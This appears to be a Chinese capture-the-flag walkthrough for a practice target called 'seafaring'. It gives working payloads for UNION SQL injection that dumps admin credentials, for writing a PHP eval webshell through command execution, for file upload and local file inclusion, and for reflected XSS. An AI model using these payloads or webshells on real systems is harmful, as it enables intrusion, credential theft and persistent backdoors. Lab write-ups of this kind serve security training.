seafaring靶场漏洞测试攻略

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

相关推荐
码农开荒路14 分钟前
Redis线程模型
数据库·redis·缓存
快乐非自愿20 分钟前
接口重试的7种常用方案!
服务器·数据库·php
supermapsupport20 分钟前
SuperMap GIS基础产品FAQ集锦(20250603)
服务器·数据库·webgl·supermap·idesktop
mooyuan天天24 分钟前
pikachu靶场通关笔记12 XSS关卡08-XSS之htmlspecialchars(四种方法渗透)
安全·xss·pikachu靶场·xss漏洞
文牧之26 分钟前
PostgreSQL的扩展 passwordcheck
运维·数据库·postgresql
mooyuan天天29 分钟前
pikachu靶场通关笔记11 XSS关卡07-XSS之关键字过滤绕过(三种方法渗透)
web安全·xss·pikachu靶场·xss漏洞·xss过滤
bing_15843 分钟前
如何合理设计缓存 Key的命名规范,以避免在共享 Redis 或跨服务场景下的冲突?
数据库·redis·缓存
健康平安的活着1 小时前
mysql数据库实现分库分表,读写分离中间件sharding-sphere
数据库·mysql·中间件
黑客笔记1 小时前
安全大模型的思考
数据库·安全·web安全
穗余2 小时前
NodeJS全栈开发面试题讲解——P3数据库(MySQL / MongoDB / Redis)
数据库·mysql·node.js